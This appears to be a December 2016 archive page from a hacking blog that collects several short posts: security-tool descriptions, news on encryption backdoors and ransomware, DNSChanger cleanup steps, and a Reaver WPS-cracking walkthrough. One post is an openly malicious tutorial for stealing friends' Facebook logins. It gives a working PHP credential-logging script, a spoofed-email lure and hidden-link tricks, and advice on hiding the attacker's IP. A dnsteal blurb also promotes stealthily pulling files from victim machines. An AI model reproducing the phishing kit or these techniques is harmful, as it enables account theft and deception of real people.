Monthly Archives: December 2016

Minion – Mozilla Security Testing Framework

Minion is a security testing framework built by Mozilla to bridge the gap between developers and security testers. To do so, it enables developers to scan with a wide variety of security tools, using a simple HTML-based interface.

Minion - Mozilla Security Testing Framework

It consists of three umbrella projects:

 

  • Minion Frontend, a Python, angular.js, and Bootstrap-based website that provides a HTML interface to authenticate and authorize users, manage sites, initiate scans, and report issues
  • Minion Backend, a Python, Flask, and Twisted-based backend that provides an API for the Minion Frontend, and acts as a middleman between the frontend and external security tools
  • Minion VM, a repository of recipes to allow quick installations of Minion either via Vagrant or Docker

Functionality

Minion has limited scanning functionality built into itself. Instead, it relies on the large variety of pre-existing open source and commercial scanning tools. These plugins include:

  • Minion ZAP, which utilizes the OWASP Zed Attack Proxy
  • Minion Nmap, utilizing the Nmap network scanner
  • Minion Skipfish, utilizing the Skipfish reconnaissance tool
  • Minion SSLyze, utilizing the SSLyze TLS scanner
  • Minion SSL, which uses the sslscan TLS scanner

You can download Minion here:

Back-end: minion-backendv0.3.zip
Front-end: minion-frontend-v0.4.zip

How to Anonymously Torrent Files with Tribler

A New, Anonymous Way to Torrent Files

Two Dutch researchers at Delft University have developed an anonymous way to share files without the need for torrenting directory sites like Megaupload and Pirate Bay. Building upon a Tor-like technology, they have built an application that combines both the functionality of the torrent directory sites with torrent applications like BitTorrent or uTorrent. It is called Tribler. Developed for Windows, Mac OS X, and Linux, you can download it here.

Tribler adds three layers of proxies between you and the seeder. This insures that if one proxy is compromised, of limited anonymity or placed there by an industry or government agency, the other two will still hide your traffic. The first proxy encrypts your traffic and each additional layer adds an additional level of encryption that only you can decrypt.

Searching + Torrenting

As you can see in the screenshot below, I have downloaded and installed it on Windows 7 machine. Unlike BitTorrent and other torrenting applications, there is no need to download and install torrent files from a torrent directory. Tribler enables you to search and torrent in one application.

Streaming

Furthermore, Tribler allows you to stream the files to your computer that you find via the “Search” function at the top of the screen. You no longer have to wait for the whole file to download in order to watch it. Notice below that when I hover my mouse over the file, two orange buttons pop up, “Stream” and “Download.” If I click on Stream, I can begin watching immediately, no need to wait.

Anonymity

You can test the anonymity of Tribler by clicking on the “Downloads” tab on the left pane and Tribler will begin an automatic test of your anonymity showing you the proxy IDs and hops between you and the seeder of the file.

This new app, Tribler, offers you the anonymity to share files across the Internet without interference by government spy agencies and corporate hired guns. Enjoy, my nascent hackers, as we continue to keep the Internet free, open, and uncensored!

dnsteal – DNS Exfiltration Tool

dnsteal is a DNS exfiltration tool, essentially a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.

dnsteal - DNS Exfiltration Tool

dnsteal is coded in Python and is available on Github.

Features

dnsteal currently has:

  • Support for multiple files
  • Gzip compression supported
  • Supports the customisation of subdomains
  • Customise bytes per subdomain and the length of filename

 

Usage

You can download dnsteal here:

dnsteal.py

How to Hack Facebook Account Using Phising webPage

Everyone eager to hack the facebook account of others.  Here is the simplest method using phishing webpage ,you can hack the facebook account of your friends .

Phishing WebPage:
Creating webpage which look like any site is described as Phishing.  By creating Phishing WebPage, you can make users to believe that it is original website and enter their id and password.

Step 1:
Go to Facebook.com
Right click on the white space of the front page.  Select “View Page source”.
Copy the code to Notepad.

Step2:
Now find (Press ctrl +f)  for “action=”  in that code.
You fill find the code like this:

The big red ring that circles the action= you have to change. You have to change it to ‘action=”next.php” ‘. after you have done that, you should change the method (small red circle on the picture) to “get” instead of “post”, or else it will not work. Save the document as index.html

Step 3:
Now we need to create the “next.php” to store the password.  so open the notepad and type the following code:

<?php
header(“Location: http://www.Facebook.com/login.php “);
$handle = fopen(“pswrds.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

save this file as “next.php”

Update: I have updated the php script. Now it is working …! Rectified all the problem and errors.

Step 4:
open the notepad and just save the file as “pswrds.txt” without any contents.

Now upload those three files(namely index.html,next.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com.
use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.

Step 5:
 create an mail account with facebook keyword like : FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_friends@gmail.com

Step 6 :

Copy the original Facebook friendship invitation and paste in your mail.
remove the hyperlink from this  http:/www.facebook.com/n/?reqs.php
Mark it and push the Add hyperlink button
*Updated* 
everyone asking doubts about this 6th step.   You may get Facebook friendship invitation from Facebook when someone “add as a friend”, right? Just copy that mail and paste in compose mail.  In that content , you can find this link http:/www.facebook.com/n/?reqs.php .  Just change the delete the link and create link with same text but link to your site.

Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page..

Note:
For user to believe change Your phishing web page url with any of free short url sites.
Like : co.nr, co.cc,cz.cc
This will make users to believe that it is correct url.

Encryption backdoors are against US national interest, say lawmakers

Any attempt to weaken encryption is against the national interest, a group of US lawmakers has warned.

The widespread use of strong encryption has lead to complaints from law enforcement agencies that they are unable to access to communications of criminals – the so-called ‘going dark’ issue. This has lead to calls for government to order tech companies to install backdoors into the encryption they use, in order to allow investigators access to data. Critics of this move argue backdoors would weaken security and privacy for everyone, with little benefit to law enforcement.

“Any measure that weakens encryption works against the national interest,” it said and also noted that encryption is a global technology that is widely and increasingly available. It also said that there are different attitudes to encryption and the going dark phenomenon, and so “there is no one-size-fits-all solution to the encryption challenge.” The group said Congress should foster cooperation between the law enforcement community and technology companies.

“Encryption is inexorably tied to our national interests. It is a safeguard for our personal secrets and economic prosperity. It helps to prevent crime and protect national security,” the report said, but added: “The widespread use of encryption technologies also complicates the missions of the law enforcement and intelligence communities,” and said those complications cannot be ignored.

How to detect and fix a machine infected with DNSChanger

On Mac systems open the Network system preferences and for each network service (Wi-Fi, Ethernet, Bluetooth, etc.), select the service and then click the “Advanced” button. Follow this by selecting the “DNS” tab and making note of the DNS servers listed. You can also do this in the Terminal by first running the following command:

Check this location for all network connections to see the DNS configuration in OS X (click for larger view).Photo by Screenshot by Topher Kessler/CNET

networksetup -listallnetworkservices

After this command is run, next run the following command on each of the listed names (be sure to remove any asterisks from in front of the names, and ensure the names are in quotes if there are any spaces in them):

networksetup -getdnsservers “SERVICE NAME”

Repeat this command for all listed services (Especially Ethernet and Wi-Fi connections) to list all configured DNS servers.

On a Windows machine (including any of those you may have installed in a virtual machine), you can open the command-line tool (select “Run” from the Start menu and enter “cmd,” or in Windows 7 select “All Programs” and then choose the command line from the Accessories folder). In the command line, run the following command to list all network interface information, including configured DNS server IP addresses:

Windows DNS server settings for all interfaces can be seen in its command line (click for larger view).Photo by Screenshot by Topher Kessler/CNET

ipconfig /all

Once you have your system’s DNS servers listed, enter them into the FBI’s DNS checker Web page to see if they are identified as part of the rogue DNS network. In addition to manually looking up and checking your DNS settings, a number of Web services have popped up that will test your system for the DNSChanger malware. The DNSChanger Working Group has compiled a list of many of these services, which you can use to test your system (for those in the U.S., you can go to dns-ok.us to test your connection).

If these tests come up clean, then you have nothing to worry about; however, if they give you any warnings, then you can use an anti-malware scanner to check for and remove the DNSChanger malware. Given that the malware was abruptly halted in November 2011, there’s been ample time for security companies to update their anti-malware definitions to include all variants of DNSChanger. If you have a malware scanner and have not used it recently, then be sure to launch and update it fully, followed by performing a full scan of your system. Do this for every PC and Mac on your network, and in addition be sure to check your router’s settings to see if the DNS settings there are proper ones from your ISP or are rogue DNS settings.

If your router or computer is not showing any valid DNS server addresses after you have removed the malware, and your system is unable to connect to Internet services, then you might try configuring your system to use a public DNS service, such as those from OpenDNS and Google, by entering the following IP addresses into your system’s network settings:

8.8.8.8
8.8.4.4
208.67.222.222
208.67.220.220

If after Monday you find you can no longer access the Internet, then it’s likely your system or network router is still configured with the rogue DNS servers and you will need to again attempt to detect and remove the malware from your systems. Luckily the malware is not viral in nature so it will not self-propagate and automatically re-infect systems. Therefore, once removed and once users have set up valid DNS servers on their systems, then the affected computers should have proper access to the Internet.

Background
DNS is the “Domain Name System,” which acts like the Internet’s phone book and translates human-friendly URLs such as “www.cnet.com” into their respective IP addresses that computers and routers use to establish connections. Since DNS is the interface between the typed URL and the targeted server, the crime ring created its own DNS network that would in large part work normally, but would also allow the ring to arbitrarily redirect the traffic for specific URLs to fake Web sites for the purposes of stealing personal information or getting people to click on ads.

Python Code For Accessing Physical Location

import pygeoip
 gi = pygeoip.GeoIP('/opt/GeoIP/Geo.dat')
 def printRecord(tgt): 
rec = gi.record_by_name(tgt)
 city = rec['city'] 
region = rec['region_name']
 country = rec['country_name']
 long = rec['longitude']
 lat = rec['latitude'] 
print '[*] Target: ' + tgt + ' Geo-located. '
 print '[+] '+str(city)+', '+str(region)+', '+str(country) 
print '[+] Latitude: '+str(lat)+ ', Longitude: '+ str(long) tgt = 'ip adress here' printRecord(tgt)

 

Encryption Challenge

Description: Encryption Challenge consist of 1 negative number 1 neutral number and all others are positive numbers.
Difficulty:
unknown

 

05171606.05161220.16'12.1810161118.0510.132005.1605.241313.22101220.100405;.05171606.05161220.1612.1810161118.0510.0605241121.0409.241121.0617100405;.16.22072422142021.05171606!.

 

 

Hacking router with Reaver, guide to brute forcing Wifi Protected Setup

I thought I would share how easy it is to take down a router that is vulnerable against WPS attacks like my own. Reaver is an open source tool that brute forces WPS (Wifi Protected Setup). This is the pin (usually printed on the bottom of your router) that you can use to authenticate other devices to your wireless network without typing in a password. With enough time, reaver can crack this pin and reveal the WPA or WPA2 password.

Getting Started
To get started you will need to be on Linux, you will need the aircrack suite and reaver installed, and your wireless nic will need to be put into monitor mode. I’m using Ubuntu for this post from a friends computer. You’ll notice I’ve masked some personal details in the images below to hide my router details. I’ll explain as we move along.

In Ubuntu(debian) you can install aircrack and reaver just like you install everything else.

If you need to download, and need help installing Ubuntu, you can use this page for help.
http://www.ubuntu.com/download/desktop

Next you need to put your wireless card into monitor mode (mon0). I’m using an internal wireless card so my wireless interface is wlan0, however you can run ifconfig to ensure your using wlan0 or wlan1. To put your interface into monitor mode you would run the following:

Next you need to obtain the unique identifier for the router you wish to crack. Here’s a screenshot of me running airodump to grab my access points bssid. Masked for privacy reasons but you get the point.

bssid

 

If you like, you can use the tool Wash to test to see if WPS is enabled on the router in question. Notice that I used the arguement –ignore-fcs in my syntax to hide any fcs errors.You can see from the picture below that WPS is enabled on the router found.

wash

Now you can start up reaver.

startingreaver

 

 

Now reaver runs for a while, trying to bruteforce the WPS pin.

reaverinprogress

 

 

In After about 2 hours, reaver hits my pin and gives up the password for the router. In the screenshot I re-run reaver with my pin used first to save time. And that’s it. It’s that easy.

 

passwordgot

 

 

If you need any help with the commands you can ask for help, or read the man pages.

Protecting yourself
The easiest way to protect yourself is to turn WPS off, however some routers don’t have an option to turn it off, and some routers are still vulnerable even if the feature is turned off. Personally I would recommend using a third party firmware on your router like DD-WRT. DD-WRT doesnt support WPS, so no worries there.

Further reading:
If your looking to learn more about wireless hacking and reaver here are some links I would suggest.

http://www.aircrack-ng.org – aircrack suite
http://code.google.com/p/reaver-wps/
– Reaver webpage, also has a point and click commercial version.

New ransomware lets you decrypt your files — by infecting other users

A new kind of ransomware comes with its own “referrals” program, one that you probably wouldn’t want to join.

The malware dubbed “Popcorn Time” locks your Windows computer’s files with strong AES-256 encryption, until you a pay a ransom of one bitcoin (or $780 at the time of writing).

A series of screenshots tweeted by the MalwareHunterTeam, which found the ransomware, shows that the criminals purport to be Syrian, and that the money paid “will be used for food, medicine, and shelter to those in need.”

“We are extremely sorry that we are forcing you to pay but that’s the only way that we can keep living,” said the ransomware note.

a-3-why.jpg

(Image: MalwareHunterTeam)